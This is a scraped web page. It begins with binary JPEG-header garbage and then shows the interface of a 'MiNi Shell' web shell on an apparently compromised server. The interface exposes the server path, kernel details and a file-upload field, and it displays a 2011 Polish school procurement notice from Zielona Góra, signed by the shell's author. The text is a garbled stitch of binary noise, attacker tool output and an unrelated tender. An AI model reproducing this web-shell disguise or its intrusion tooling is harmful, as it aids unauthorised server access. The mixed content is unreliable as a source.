JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110128/33595-N-2011.html

<p class="kh_header"><b>Zielona Góra: Zarządzanie projektem pn. Nasza szkoła, nasi uczniowie-projekt rozwojowy Gimnazjum nr 1 w Zielonej Górze - w ramach zadania współfinansowanego ze środków Europejskiego Funduszu Społecznego realizowanego przez Gimnazjum nr 1 Zielonej Górze - Specjalista ds. przeprowadzenia zajęć.</b><br>
<b>Numer ogłoszenia: 33595 - 2011; data zamieszczenia: 28.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> GIMNAZJUM NR 1 , ul. Stefana Wyszyńskiego 101, 65-536 Zielona Góra, woj. lubuskie, tel. 0-68 326 36 80, faks 0-68 326 36 80.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gimnazjum1.zgora.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: SZKOŁA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zarządzanie projektem pn. Nasza szkoła, nasi uczniowie-projekt rozwojowy Gimnazjum nr 1 w Zielonej Górze - w ramach zadania współfinansowanego ze środków Europejskiego Funduszu Społecznego realizowanego przez Gimnazjum nr 1 Zielonej Górze - Specjalista ds. przeprowadzenia zajęć..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usługi Specjalisty ds. przeprowadzenia zajęć pn.: Nasza szkoła, nasi uczniowie - projekt rozwojowy Gimnazjum nr 1 w Zielonej Górze,  realizowanego przez Miasto Zielona Góra - Gimnazjum nr 1 w Zielonej Górze w ramach Programu Operacyjnego Kapitał Ludzki, Priorytetu IX Rozwój wykształcenia i kompetencji w regionach, Działania 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Nr projektu: WND-POKL.09.01.02-08-069 10.
2. Projekt obejmuje 5 narzędzi realizacji programów rozwojowych:
.	dodatkowe zajęcia dydaktyczno-wyrównawcze,
.	doradztwo i opiekę pedagogiczno-psychologiczną,
.	dodatkowe zajęcia dla ucz. ukierunkowane na rozwój kompetencji kluczowych,
.	szkolny ośrodek kariery,
.	wdrożenie innowacyjnych form nauczania.
Wsparciem zostanie objętych 206 ucz. G1 z klas I-III. Uczestnicy projektu będą pochodzić z 3 zdefiniowanych grup tj.:
.	młodzież trudna tj. ucz. o opóźnionym rozwoju edukacyjnym oraz pochodzący z rodzin ubogich,
.	niezaradnych oraz wchodzących w kolizję z prawem - 96 ucz.
.	uczniowie uzdolnieni z ubogich rodzin-70 ucz.
.	uczniowie z zaniedbaniami zdrowotnymi -40 ucz.
3. Zakres merytoryczny projektu obejmuje następujące główne zadania:
.	Zadanie 1. Zarządzanie projektem - organizacja biura projektu, organizacja zajęć, bieżący monitoring, 
zakup wyposażenia (wszystkie zakupy w ramach projektu realizowane będą zgodnie z przepisami Ustawy Prawo Zamówień Publicznych),prowadzenie księgowości projektu, wybór kadry nauczyciel-skiej, kontakt z instytucją pośredniczącą, itp. 
.	Zadanie 2. Rekrutacja, Informacja, Promocja i PR projektu - rekrutacja będzie realizowana we wrześniu br., a promocja przez cały czas realizacji projektu. Utworzenie podstrony internetowej, spotkania z rodzicami, tablica ogłoszeń, ulotki, plakaty, informacja w szkolnej gazetce, roll-upy.
.	Zadanie 3. Zajęcia dydaktyczno - wyrównawcze (matematyka).  Uczniowie (24 osoby) zostaną podzie-leni na 3 grupy wiekowe po 8 osób. Każda grupa 2 h zajęć w tyg. - 6 h w miesięcu (54 h w roku), w sumie dla 3 grup 162 h.
.	Zadanie 4. Zajęcia dydaktyczno - wyrównawcze (język polski). Uczniowie (24 osób) zostaną podzieleni na 3 grupy wiekowe po 8 osób. Każda grupa 2 h zajęć w tyg. - 6 h w miesiącu (54 h w roku), w sumie dla 3 grup 162 h.
.	Zadanie 5. Zajęcia dydaktyczno - wyrównawcze (język angielski). Uczniowie (24 osób) zostaną podzieleni na 3 grupy wiekowe po 8 osób. Każda grupa 2 h zajęć w tyg. - 6 h w miesiącu (54 h w roku), w sumie dla 3 grup 162 h.
.	Zadanie 6. Zajęcia dydaktyczno - wyrównawcze (język niemiecki). Uczniowie (24 osób) zostaną podzieleni na 3 grupy wiekowe po 8 osób. Każda grupa 2 h zajęć w tyg. - 6 h w miesiącu (54 h w roku), w sumie dla 3 grup 162 h.
.	Zadanie 7. Zajęcia kompetencje kluczowe matematyczno - przyrodnicze. Uczniowie klas I, II, III zostaną podzieleni na 6 zespołów: Pitagoras, Laboratorium chemiczne, Młody fizyk, Koło biologiczne, 
Krajoznawstwo, Fakultet ścisłowca. Przewiduje się 6 grup (35 osób) o różnej liczebności (5-8 os.). Grupa po 2 h zajęć w tyg. - 6 h w miesiącu (54 h w roku), w sumie dla 3 grup 324 h.
.	Zadanie 8. Zajęcia kompetencje kluczowe-przedsiębiorczość, informatyka (ICT) i humanistyka. Uczniowie klas I, II, III zostaną podzieleni na 6 zespołów: Koło młodego przedsiębiorcy, Klub Euromaniak, Zespół redakcyjny GIMZETKI, Koło informatyczne (ICT), Klub teatralny, Fakultet humanisty. Przewiduje się 6 gr. (35 osób) o różnej liczebności(5-8 osób).Grupa po 2 h zajęć w tyg. - 6 h w miesiącu (54 h w roku), w sumie dla 6 grup 324 h.
.	Zadanie 9. Zajęcia aktywizujące. Uczniowie klas I, II, III. Przewiduje się utworzenie 5 gr. po 8 osób (łącznie 40 osób): Klub turystyki rowerowej, Ratownictwo wodne, Pomoc przedmedyczna, Klub nordic walking i rekreację sportową. Grupa ma 2 h zajęć w tyg. - 6 h w miesiącu (54 h w roku),  w sumie dla 5 grup 270 h.
.	Zadanie 10. Zajęcia z dyslektykami - dla 15 uczniów dotkniętych dysleksją rozwojową tj. specyficznymi  trudnościami w uczeniu się m. in. czytania, pisania, liczenia (dla części ucz. biorących udział w zajęciach wyrównawczych) 1x tydzień po 1h w 3 gr. wiekowych (po 5 os.). (dla 1 grupy 3h - miesiącu 27 h w roku, w sumie dla 3 grup 81 h). 
.	Zadanie 11. Opieka pedagogiczno - psychologiczna - 1x tydzień po 1h w 3 grupy wiekowych (po 10 osób). (dla 1 grupy 3h - miesiąc 27 h w roku, w sumie dla 3 grup 81 h). Zajęcia skierowane będą do ucz. wykazujących największe problemy w nauce (ucz. biorących udział w zajęciach wyrównawczych) zagrożonych przedwczesnym wypadnięciem z systemu oświaty. Na zajęciach stosowane będą innowacyjne metody nauczania: metoda projektu, ortograffiti - program terapeutyczny rekomendowany przez Polskie Towarzystwo Dysleksji; kinezjologia edukacyjna - metoda przyspieszonego uczenia się; metoda polisensoryczna - angażowanie wielu zmysłów.
.	Zadanie 12. Szkolny ośrodek kariery - SOK będzie miejscem, w którym 20 uczniów biorących udział w 
jednych z zajęć wymienionych w zadaniach od 3 do 9 otrzyma pomoc w planowaniu swojego dalszego kształcenia i kariery zawodowej. Praca będzie przybierać różne formy: treningów, warsztatów, porad indywidualnych pod opieką szkolnego doradcy zawodowego. Z usług SOK będzie można skorzystać 2 x miesiąc po 5 h (10h - miesiąc).Łącznie 90 h w roku szkolnym.
4. Zamówienie obejmuje pełnienie funkcji Specjalisty ds. przeprowadzenia zajęć, do którego obowiązków będzie należało: 
4.1	Działania formalno - organizacyjne związane z zatrudnieniem nauczycieli.
4.2	Bieżąca współpraca z nauczycielami prowadzącymi zajęcia w projekcie.
4.3	Zatwierdzenie zakresów merytorycznych poszczególnych zajęć opracowanych przez nauczycieli.
4.4	Opracowanie szczegółowego harmonogramu zajęć.
4.5	Kontrola i monitoring zajęć prowadzonych w ramach projektu .
4.6	Kontrola i monitoring dzienników zajęć prowadzonych na potrzeby poszczególnych zajęć,
4.7	Powiadamianie IP (Urząd Marszałkowski Województwa Lubuskiego) o zmianie terminów odbywania zajęć.
4.8	Uzupełnianie składu uczniów, w przypadku rezygnacji lub skreśleniu ucznia z projektu.
4.9	Współpraca z nauczycielami w przygotowaniu materiałów dydaktycznych na zajęcia.
4.10	Kontrola częstotliwości występowania prac kontrolnych na zajęciach oraz sporządzanie dokumentu podsumowującego.
4.11	Obsługa administracyjno - techniczna zajęć prowadzonych w projekcie.
4.12	Dokonywanie innych czynności zastrzeżonych do kompetencji Specjalisty ds. przeprowadzenia zajęć.
5. Bezpośredni nadzór nad pracą Specjalisty ds. przeprowadzenia zajęć sprawuje Kierownik projektu.   
6. Wykonawca gwarantuje pełną dyspozycyjność we wszystkie dni robocze w trakcie trwania projektu. Wykonywanie zleconych zadań odbywać się będzie przez czas trwania umowy, głównie w dni robocze po godz. 15:00. Szczegółowe terminy realizacji przedmiotu umowy ustalone zostaną z Zamawiającym.
7. Wykonawcy przyjmujący obowiązki związane z prowadzeniem projektu będą zatrudnieni przez Zamawiającego na podstawie umowy zlecenia.
8. Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami opisanymi dla przedmiotu 
zamówienia.
9. Wykonawcę obowiązuje należyta staranność przy realizacji zobowiązań umowy.
10. Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Wykonawcę z ustanowionym przedstawicielem Zamawiającego.
11. Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna wykazanie, że w okresie ostatnich trzech lat przed upływem terminu składania ofert do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, pełnił funkcję kierowniczą w oświacie  i potrafi udokumentować, że obowiązki te zostały wykonane lub są wykonywane należycie.  
Sprawdzenie ww. warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych dokumentów i oświadczeń wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje osobami zdolnymi do wykonywania zamówienia, a w szczególności odpowiedzialnych za świadczenie usług, posiadające kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonywanych przez nie czynności tj. minimum 1 osobą, która:
.	posiada wykształcenie wyższe pedagogiczne,
.	posiada ukończone studia podyplomowe z zakresu organizacji i zarządzania oświatą,
.	posiada, co najmniej pięcioletnie doświadczenie zawodowe na stanowisku kierowniczym,
.	posiada ukończony kurs obsługi komputera.

Sprawdzenie ww. warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych doku-mentów i oświadczeń wg zasady spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>.wypełniony formularz oferty wg załącznika Nr 1 do SIWZ;
.oświadczenie, że Wykonawca wykona zamówienie własnymi siłami lub określi część zamówienia, której  wykonanie powierzy Podwykonawcom wg załącznika Nr 6 do SIWZ; 
.wypełnione i podpisane oświadczenie o spełnianiu warunków art. 22 ust. 1 pkt 1 - 4 ustawy pzp w za-łącznika Nr 7 do SIWZ;
.pisemne zobowiązanie, o którym mowa w pkt  5.2. SIWZ, o ile Wykonawca polega na zasobach in-nych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy pzp;
.zaakceptowany projekty umowy wg załącznika Nr 8 do SIWZ;
.pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania Wykonaw-cy, o ile ofertę składa pełnomocnik Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gimnazjum1.zgora.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, ul. Stefana Wyszyńskiego 101, 65- 536 Zielona Góra, sekretariat..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2011 godzina 09:00, miejsce: siedziba Zamawiającego, ul. Stefana Wyszyńskiego 101, 65- 536 Zielona Góra 
sekretariat szkoły..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Tak.
Nr projektu: WND-POKL.09.01.02-08-069/10.
Nasza szkoła, nasi uczniowie-projekt rozwojowy Gimnazjum nr 1 w Zielonej Górze.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com